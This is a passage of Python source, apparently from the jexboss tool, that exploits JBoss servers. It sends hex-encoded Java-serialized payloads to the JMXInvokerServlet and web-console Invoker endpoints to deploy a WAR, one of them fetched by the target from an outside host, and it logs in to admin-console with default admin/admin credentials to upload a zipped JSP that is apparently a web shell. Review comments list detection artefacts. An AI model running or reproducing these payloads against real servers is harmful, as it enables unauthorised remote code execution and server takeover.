        "\x74\x6c\x6e\x28\x64\x69\x73\x72\x29\x3b\x20\x64\x69\x73\x72\x20\x3d\x20\x62"
        "\x72\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x7d\x20\x7d\x63\x61"
        "\x74\x77\xbc\x63\x68\x28\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x20\x65\x29\x20"
        "\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28\x22\x55\x6e\x6b\x6e"
        "\x6f\x77\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2e\x22\x29\x3b\x20\x7d\x20\x7d"
        "\x20\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x42\x6f"
        "\x6f\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee\x02\x00\x01\x5a\x00\x05"
        "\x76\x61\x6c\x75\x65\x78\x70\x01\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e"
        "\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b"
        "\x47\x02\x00\x00\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c"
        "\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00\x7e\x00"
        "\x0f\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65\x61\x6e\x21\x96\x59"
        "\xec\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00\x01\x73\x72\x00\x22\x6f\x72\x67"
        "\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49"
        "\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85"
        "\xf9\x02\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00\x00"
        "\x04\x70\x78")
    headers = {"Content-Type": "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",
               "Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
               "Connection": "keep-alive",
               "User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
    r = pool.urlopen('POST', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload)
    result = r.status
    # A 401 on the POST triggers one more attempt with the HEAD verb, same
    # headers and body; its response is not inspected.
    if result == 401:
        print(" Retrying...")
        pool.urlopen('HEAD', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload)
    return get_successfully(url, "/jexinv3/jexinv3.jsp")
def exploit_web_console_invoker(url):
    """
    Ask MainDeployer, through the web-console invoker, to deploy a remote WAR.

    POSTs a Java-serialized RemoteMBeanInvocation to /web-console/Invoker.
    No credentials are sent.
    Per the original author: does not work in JBoss 5 (bug in JBoss5).

    :param url: The URL to exploit
    :return: The value of get_successfully(url, "/jexws3/jexws3.jsp");
        presumably an HTTP status code -- confirm against jexboss
    """
    # Java serialization stream (magic bytes \xac\xed\x00\x05) for an
    # org.jboss.console.remote.RemoteMBeanInvocation: action name "deploy",
    # one java.net.URL parameter (protocol http, host joaomatosf.com, file
    # /rnp/jexws3.war) and the target ObjectName
    # jboss.system:service=MainDeployer.
    # NOTE(review): the WAR location is baked into the serialized bytes, so
    # the target fetches it from that third-party host over plain HTTP and
    # the operator does not control what gets deployed. Detection artefacts:
    # POSTs of application/x-java-serialized-object to /web-console/Invoker,
    # the target's outbound fetch, and requests for /jexws3/jexws3.jsp.
    payload = (
        "\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e"
        "\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x72\x65\x6d\x6f\x74\x65\x2e\x52\x65\x6d\x6f"
        "\x74\x65\x4d\x42\x65\x61\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xe0\x4f"
        "\xa3\x7a\x74\xae\x8d\xfa\x02\x00\x04\x4c\x00\x0a\x61\x63\x74\x69\x6f\x6e\x4e"
        "\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74"
        "\x72\x69\x6e\x67\x3b\x5b\x00\x06\x70\x61\x72\x61\x6d\x73\x74\x00\x13\x5b\x4c"
        "\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x5b\x00"
        "\x09\x73\x69\x67\x6e\x61\x74\x75\x72\x65\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61"
        "\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x10\x74\x61\x72"
        "\x67\x65\x74\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x74\x00\x1d\x4c\x6a\x61"
        "\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2f\x4f\x62\x6a\x65"
        "\x63\x74\x4e\x61\x6d\x65\x3b\x78\x70\x74\x00\x06\x64\x65\x70\x6c\x6f\x79\x75"
        "\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65"
        "\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00"
        "\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25"
        "\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64"
        "\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74"
        "\x79\x71\x00\x7e\x00\x01\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x01\x4c"
        "\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x01\x4c\x00\x08\x70\x72\x6f\x74\x6f"
        "\x63\x6f\x6c\x71\x00\x7e\x00\x01\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x01"
        "\x78\x70\xff\xff\xff\xff\xff\xff\xff\xff\x74\x00\x0e\x6a\x6f\x61\x6f\x6d\x61"
        "\x74\x6f\x73\x66\x2e\x63\x6f\x6d\x74\x00\x0f\x2f\x72\x6e\x70\x2f\x6a\x65\x78"
        "\x77\x73\x33\x2e\x77\x61\x72\x71\x00\x7e\x00\x0b\x74\x00\x04\x68\x74\x74\x70"
        "\x70\x78\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53"
        "\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70"
        "\x00\x00\x00\x01\x74\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c"
        "\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e"
        "\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15"
        "\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62\x6f\x73\x73\x2e\x73\x79\x73\x74"
        "\x65\x6d\x3a\x73\x65\x72\x76\x69\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c"
        "\x6f\x79\x65\x72\x78")
    headers = {
        "Content-Type": "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation",
        "Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
        "Connection": "keep-alive",
        "User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
    r = pool.urlopen('POST', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload)
    result = r.status
    # A 401 on the POST triggers one more attempt with the HEAD verb, same
    # headers and body; its response is not inspected.
    if result == 401:
        print(" Retrying...")
        pool.urlopen('HEAD', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload)
    return get_successfully(url, "/jexws3/jexws3.jsp")
def get_viewstat_admin_console(page):
    """
    Pull the javax.faces.ViewState token out of an admin-console page.

    The first line mentioning javax.faces.ViewState decides the result: when
    the word "value" occurs exactly once on that line the first value="..."
    attribute is returned, otherwise the second one.

    :param page: Page body; anything str() accepts (response bytes included)
    :return: The token text, or None when no line mentions the field
    """
    # str() of a bytes body yields its repr, where line breaks show up as the
    # two characters backslash + n; turn those back into real newlines.
    text = str(page).replace("\\n", "\n")
    for line in text.split('\n'):
        if 'javax.faces.ViewState' not in line:
            continue
        attribute_index = 1 if line.count('value') == 1 else 2
        return line.split("value=\"")[attribute_index].split("\"")[0]
def get_boundary_admin_console(jboss_version, state, payload):
    """
    Build the multipart/form-data body for the admin-console upload form.

    The body carries the createContentForm marker, the file part (sent as
    jexws3.war, application/octet-stream), the version-specific rhq_prop
    fields set to "false", the addButton field and the ViewState token.

    :param jboss_version: 6 or 5; selects which rhq_prop field names are sent
    :param state: javax.faces.ViewState token (str)
    :param payload: File content placed in the file part (str)
    :return: The body as a str, or None for any other jboss_version
    """
    delimiter = "-----------------------------8994251555011888521050172030"

    # The two form layouts differ only in their rhq_prop field names.
    if jboss_version == 6:
        flag_fields = ("createContentForm:rhq_prop-0_328868266",
                       "createContentForm:rhq_prop-0_-1257012452")
    elif jboss_version == 5:
        flag_fields = ("createContentForm:rhq_prop-1995377939_328868266",)
    else:
        return None

    def text_part(name, value):
        # One plain form field: header line, blank line, value.
        return ("Content-Disposition: form-data; name=\"" + name + "\"\r\n"
                + "\r\n"
                + value + "\r\n")

    sections = [text_part("createContentForm", "createContentForm")]
    sections.append(
        "Content-Disposition: form-data; name=\"createContentForm:file\"; filename=\"jexws3.war\"\r\n"
        + "Content-Type: application/octet-stream\r\n"
        + "\r\n"
        + payload + "\r\n")
    for field_name in flag_fields:
        sections.append(text_part(field_name, "false"))
    sections.append(text_part("createContentForm:addButton", "Continue"))
    sections.append(text_part("javax.faces.ViewState", state))

    opened = "".join(delimiter + "\r\n" + section for section in sections)
    return opened + delimiter + "--\r\n"
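def url_encode(text):
    """
    Percent-encode text for use as an application/x-www-form-urlencoded value.

    Both interpreter branches now use quote_plus, so the result no longer
    depends on the Python major version: previously Python 3 used quote(),
    which leaves "/" unescaped and writes a space as %20, while Python 2
    used quote_plus().

    :param text: The text to encode
    :return: The encoded text, with spaces as "+" and "/" as %2F
    """
    if version_info[0] >= 3:
        # Imported here because the module only brings in `quote` from
        # urllib.parse at file level.
        from urllib.parse import quote_plus
        return quote_plus(text)
    return urllib.quote_plus(text)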
def exploit_admin_console(url):
    """
    Log in to the admin-console with default credentials and upload a WAR.

    Flow, as coded: GET /admin-console/login.seam for a session cookie and
    ViewState, POST the login form with admin/admin, follow the redirect,
    open the "create content" form for Web Application (WAR) resources, then
    POST a multipart upload to
    /admin-console/secure/resourceContentCreate.seam -- first with the
    JBoss 6 field layout and, if that is not answered with a 302, with the
    JBoss 5 layout.
    Per the original author: tested and works in JBoss 5 and 6.

    NOTE(review): block structure below is reconstructed from a listing
    that lost its indentation -- confirm against the upstream file.
    NOTE(review): this path only succeeds where the admin-console still
    accepts admin/admin; changing that default removes it. Detection
    artefacts: the login POST to /admin-console/login.seam, the upload POST
    and requests for /jexws3/jexws3.jsp.

    :param url: The URL to exploit
    :return: The value of get_successfully(url, "/jexws3/jexws3.jsp") after
        a successful login (presumably an HTTP status code -- confirm
        against jexboss), or 404 when the login is not answered with a 302
    """
    # Use default password for Jboss 5 and 6
    username = "admin"
    password = "admin"
    headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Connection": "keep-alive",
        "User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
    r = pool.request('GET', url+"/admin-console/login.seam", headers=headers)
    # Only the first "name=value" pair of Set-Cookie is reused.
    # NOTE(review): raises AttributeError when the response carries no
    # Set-Cookie header, because getheader() then returns None.
    cookie = r.getheader('set-cookie').split(";")[0]
    headers['Cookie'] = cookie
    state = get_viewstat_admin_console(r.data)
    #payload = ("login_form=login_form&login_form:name=%s&login_form:password=%s&login_form:submit=Login"
    # "&javax.faces.ViewState=%s" % (username, password, state))
    payload = "login_form=login_form&login_form%3Aname="+username+"&login_form%3Apassword="+password+"&login_form%3Asubmit=Login&javax.faces.ViewState="+url_encode(state)
    headers['Content-Type'] = "application/x-www-form-urlencoded"
    print(GREEN + "\n * Info: Trying to perform authentication with default credentials..." +ENDC)
    r = pool.request('POST', url+"/admin-console/login.seam", body=payload, headers=headers, redirect=False)
    state = get_viewstat_admin_console(r.data)
    # A 302 on the login POST is treated as a successful login.
    if r.status == 302:
        print(GREEN + " * Info: Successfully logged in! Wait..." + ENDC)
        location = r.getheader('Location')
        # Takes the text between the first and second "=" of the redirect
        # target as the conversation id; presumably the URL carries it as its
        # only query parameter -- verify.
        conversation_id = location.split('=')[1]
        r = pool.request('GET', location, headers=headers)
        # No ViewState in the login response: pause before continuing.
        # `sleep` is not imported in this file's visible imports; presumably
        # it arrives through `from jexboss import *`.
        if state == None:
            sleep(7)
        r = pool.request('GET', url+"/admin-console/secure/summary.seam?path=-3%2FApplications%2FWeb+Application+%28WAR"
                         "%29&conversationId="+conversation_id+"&conversationPropagation=end", headers=headers)
        # The next request uses the following conversation id.
        conversation_id = str(int(conversation_id)+1)
        r = pool.request('GET', url+"/admin-console/secure/resourceTypeSummary.seam?actionMethod=secure%2FresourceType"
                         "Summary.xhtml%3AcreateContentBackedResourceAction.init%28%29&conversationId="
                         + conversation_id, headers=headers)
        state = get_viewstat_admin_console(r.data)
        # The boundary declared here is the delimiter used by
        # get_boundary_admin_console minus its two leading dashes.
        headers['Content-Type'] = "multipart/form-data; boundary=---------------------------8994251555011888521050172030"
        # ZIP archive (PK\x03\x04 signature) with three entries: META-INF/,
        # META-INF/MANIFEST.MF and jexws3.jsp. The JSP entry is compressed,
        # so its content cannot be read from this listing.
        payload = ("\x50\x4b\x03\x04\x14\x00\x08\x08\x08\x00\x6d\x7c\x98\x48\x00\x00\x00\x00"
                   "\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x04\x00\x4d\x45\x54\x41\x2d\x49\x4e"
                   "\x46\x2f\xfe\xca\x00\x00\x03\x00\x50\x4b\x07\x08\x00\x00\x00\x00\x02\x00\x00"
                   "\x00\x00\x00\x00\x00\x50\x4b\x03\x04\x14\x00\x08\x08\x08\x00\x6d\x7c\x98\x48"
                   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x4d\x45\x54"
                   "\x41\x2d\x49\x4e\x46\x2f\x4d\x41\x4e\x49\x46\x45\x53\x54\x2e\x4d\x46\xf3\x4d"
                   "\xcc\xcb\x4c\x4b\x2d\x2e\xd1\x0d\x4b\x2d\x2a\xce\xcc\xcf\xb3\x52\x30\xd4\x33"
                   "\xe0\xe5\x72\x2e\x4a\x4d\x2c\x49\x4d\xd1\x75\xaa\x04\x09\x58\xe8\x19\xc4\x9b"
                   "\x9b\x2b\x68\xf8\x17\x25\x26\xe7\xa4\x2a\x38\xe7\x17\x15\xe4\x17\x25\x96\x00"
                   "\x95\x6b\xf2\x72\xf1\x72\x01\x00\x50\x4b\x07\x08\x05\xa0\x0e\xbc\x43\x00\x00"
                   "\x00\x44\x00\x00\x00\x50\x4b\x03\x04\x14\x00\x08\x08\x08\x00\x68\x7c\x98\x48"
                   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x6a\x65\x78"
                   "\x77\x73\x33\x2e\x6a\x73\x70\x95\x55\x5f\x6f\x1a\x39\x10\x7f\xbf\x4f\x31\xb1"
                   "\x94\xca\x94\xb2\xb4\xba\x97\x53\x08\xd1\xa5\xb9\x54\x69\x14\xe9\x22\x52\xae"
                   "\x0f\xa7\xaa\x32\xbb\x03\xeb\x74\xd7\xf6\xd9\xb3\x05\x94\xf2\xdd\x6f\xec\x05"
                   "\x02\x85\x6b\x75\x2f\xbb\xc6\x33\x9e\x9d\xf9\xfd\x31\xe7\xa7\xbf\x83\x53\x33"
                   "\x04\x5d\x3b\xeb\x69\x28\x1e\xd5\x57\x95\x35\xa4\xab\xec\xe5\xab\xb4\xd6\x96"
                   "\x57\x90\x96\x06\x29\x7b\x29\x52\xfe\xb5\xc9\x6d\xa1\xcd\x6c\x28\xc6\x1f\xde"
                   "\xf5\x7e\x13\xa7\x17\x70\xee\x3c\xf2\xf3\x14\xb4\x21\xf8\x8a\x3e\x68\x6b\x60"
                   "\x08\xbf\x0e\x40\x4f\x41\x7a\xfc\xa7\xc1\x40\xd9\x0c\xe9\x5e\x79\x55\x23\xa1"
                   "\x97\xc2\x39\x27\x3a\x70\x32\x04\xd3\x54\x55\x07\x9e\x60\x62\x6d\x85\xca\x40"
                   "\x5e\x62\xfe\x65\xec\x0a\x45\x18\x06\x70\x43\xe4\xc6\xa3\xbb\x2b\x6b\x0c\xe6"
                   "\x14\xeb\xe6\xbc\xbc\xda\xc9\x81\xb6\xc4\x00\xde\x36\xd3\x29\x7a\x2c\x46\xa8"
                   "\x0a\xf4\x30\xf1\xdb\x88\xc7\xe0\xac\x09\x98\x05\x24\xae\x44\x68\xe8\xc3\xd2"
                   "\xa1\x14\x84\x0b\xea\x97\x54\x57\xa2\x73\xd0\xeb\x4d\x2a\x23\x45\xea\xa7\xd7"
                   "\xb4\x1f\x7b\x6e\x19\x5e\xbc\x80\x9f\x67\x67\x9c\xa1\xaa\x20\xc5\x94\x9f\x28"
                   "\x3a\x9d\xa7\xbd\xf9\xb8\xc3\x14\x18\xc0\x0a\xf9\x05\x07\x51\xf2\x0d\x07\x8f"
                   "\x8c\x2c\x0f\x80\xe9\x80\xc1\x39\xf0\x96\x14\x25\xc7\xce\xfa\xfd\x39\x4e\x42"
                   "\x89\x55\x95\x3d\xe2\x62\x62\x43\x88\x2c\xf6\x1f\x83\xfb\xbc\xa6\x28\xa3\x05"
                   "\x71\x8b\xd6\xa1\x79\x2e\x23\x19\x89\x15\x3c\x90\x67\x8a\x21\x94\xfc\xa9\x1f"
                   "\xf0\x37\xd8\x24\x56\x2a\xd0\x8d\x6d\x7c\xea\x32\xb6\x17\x7b\xf9\x83\x7b\x95"
                   "\x9d\x8c\x6c\x9b\xc4\xcb\xe0\x2a\x4d\x52\x9c\x89\xce\xdf\xaf\x3f\x75\x45\x99"
                   "\x55\x76\xc6\x1d\x78\x74\x95\xca\xf1\xb2\xaa\xa4\x00\xf1\x0a\x44\x2f\x96\x26"
                   "\xbf\x7c\x4a\xa4\xec\x63\xd2\x82\x12\x81\xfc\x0e\x95\xc8\xee\xa8\xed\xf5\xde"
                   "\xf3\x50\x9e\x96\x52\x8c\x03\xfa\xde\xe5\x8c\x19\xe7\xba\x47\xf8\xba\xb1\x81"
                   "\x31\xe8\x8a\xf3\x9e\xe8\xee\x84\x47\x58\x5b\xc2\xcb\xa2\xf0\xb2\xb3\x96\xc6"
                   "\x49\x1c\xe9\x9d\xae\x70\x4d\xf2\x67\xd1\xdd\x9b\x9a\xb9\x5e\xe8\x40\x41\x46"
                   "\x92\xef\x79\x60\xfa\xe8\x35\x43\x05\xf3\xf6\x35\x4c\xfc\xec\x04\xfe\xab\xce"
                   "\x60\x7d\x22\xcb\x2b\x1b\x30\xf2\x31\xd9\x9c\xde\x97\x78\x02\xf9\xbd\x71\x0d"
                   "\x31\xc0\xa8\xea\xf5\xee\x01\x2e\x3c\xcf\x4e\x16\xf7\x17\x27\x62\xa7\xc6\xcf"
                   "\xfe\xb5\x75\xeb\x7b\xf6\xc5\x8c\xbf\xea\x94\x0f\xc8\x3f\xe4\xc4\x33\x31\xaa"
                   "\xb8\xd3\x06\x9f\xa9\x03\xa6\xee\xcd\xa7\x35\x24\xbb\x05\x2e\x36\xc6\xe7\xe9"
                   "\x6d\x43\x99\x8b\x83\x4a\x71\xcf\x9e\x66\x61\x1b\x46\xf3\x0c\xa8\xe4\xe6\x41"
                   "\x07\x60\x9b\xb7\x16\x01\xb2\x70\x8b\x8b\xb7\xac\x4e\xb8\x7d\xb8\x87\x8f\x1b"
                   "\xc9\xf2\x8a\xe9\xca\x6d\x5d\xa3\x29\xf8\xa0\x22\x58\xda\x86\xb7\x7c\x63\x62"
                   "\x9d\xed\x29\x2e\xc0\x80\xb0\x80\xec\x32\xed\x47\x4c\x36\x57\x90\x9d\xc2\xc6"
                   "\x03\x3c\x30\xdc\xa6\x03\x2c\x08\x8e\x03\x03\x43\x58\x64\x22\xc9\x7d\x05\xc9"
                   "\x7e\x71\xa6\x50\x66\x0c\x20\x29\x6d\xd8\xb5\xba\x60\xc3\x7f\xfb\x06\xfb\x9b"
                   "\x8e\xd7\x53\xcd\xc2\x8d\xd7\xd6\x4f\xd1\x6e\xeb\xaf\x20\x57\x94\x97\xf2\x7a"
                   "\x91\xa3\x4b\xf7\x18\x4b\x78\x8b\x53\x65\xa4\xb8\xf6\xde\xfa\xd6\xff\xd1\x51"
                   "\x53\xfe\xb1\xbd\x46\x06\xab\xe8\x06\x88\xba\xb2\x39\xf2\x10\xae\x25\xe0\x61"
                   "\xc9\x43\xd4\xc9\x99\x5b\xc5\x5b\xf6\x39\x9b\x54\x44\xe3\xdd\xd9\x39\xfa\x2b"
                   "\x15\x55\x94\x69\x53\xe0\xe2\xcf\xa9\x14\x73\x6d\x78\xaa\x0b\x78\x1d\x27\x3b"
                   "\x39\x56\x62\xca\x2a\x67\x37\xb1\x12\x14\x59\xbf\x73\x8b\xf5\xd3\x0d\xe6\x58"
                   "\x2d\xa3\xc6\x90\xae\x31\x79\xa5\x5d\xca\x68\x00\xcc\x59\xd5\x75\x11\x57\xd0"
                   "\xbf\x02\xd1\x0d\x65\x02\x60\x7d\xbb\xfd\xf8\xe4\x3a\xf7\xff\xa9\xdd\x1d\x95"
                   "\xf7\xfa\x5a\x2a\x74\x88\xc5\xf6\x94\xcc\xf6\x2a\x79\x3e\x90\x29\xb8\xf3\x07"
                   "\xb4\xcb\x46\x8c\x71\xe6\xf1\xf3\xcc\xe6\x21\x99\xdf\x15\x10\x63\xf3\xc5\xd8"
                   "\x79\xfc\xbb\xaa\x6b\x65\x9e\x85\x76\x7a\xf1\xcb\xbf\x50\x4b\x07\x08\x25\x39"
                   "\x60\x50\x70\x03\x00\x00\x7a\x07\x00\x00\x50\x4b\x01\x02\x14\x00\x14\x00\x08"
                   "\x08\x08\x00\x6d\x7c\x98\x48\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00"
                   "\x09\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4d"
                   "\x45\x54\x41\x2d\x49\x4e\x46\x2f\xfe\xca\x00\x00\x50\x4b\x01\x02\x14\x00\x14"
                   "\x00\x08\x08\x08\x00\x6d\x7c\x98\x48\x05\xa0\x0e\xbc\x43\x00\x00\x00\x44\x00"
                   "\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3d\x00\x00"
                   "\x00\x4d\x45\x54\x41\x2d\x49\x4e\x46\x2f\x4d\x41\x4e\x49\x46\x45\x53\x54\x2e"
                   "\x4d\x46\x50\x4b\x01\x02\x14\x00\x14\x00\x08\x08\x08\x00\x68\x7c\x98\x48\x25"
                   "\x39\x60\x50\x70\x03\x00\x00\x7a\x07\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00"
                   "\x00\x00\x00\x00\x00\x00\xc2\x00\x00\x00\x6a\x65\x78\x77\x73\x33\x2e\x6a\x73"
                   "\x70\x50\x4b\x05\x06\x00\x00\x00\x00\x03\x00\x03\x00\xb5\x00\x00\x00\x6a\x04"
                   "\x00\x00\x00\x00")
        # Try the JBoss 6 form layout first; fall back to the JBoss 5 layout
        # when the upload is not answered with a redirect.
        data = get_boundary_admin_console(jboss_version=6, state=state, payload=payload)
        try:
            r = pool.request('POST', url + "/admin-console/secure/resourceContentCreate.seam", headers=headers,body=data)
            if r.status != 302:
                data = get_boundary_admin_console(jboss_version=5, state=state, payload=payload)
                r = pool.request('POST', url + "/admin-console/secure/resourceContentCreate.seam", headers=headers, body=data)
        # NOTE(review): the bare except hides every failure of the upload
        # (KeyboardInterrupt included); the probe below then runs regardless.
        except:
            sleep(1)
        return get_successfully(url, "/jexws3/jexws3.jsp")
    else:
        print(RED + "\n * Authentication failed!" + ENDC)
        return 404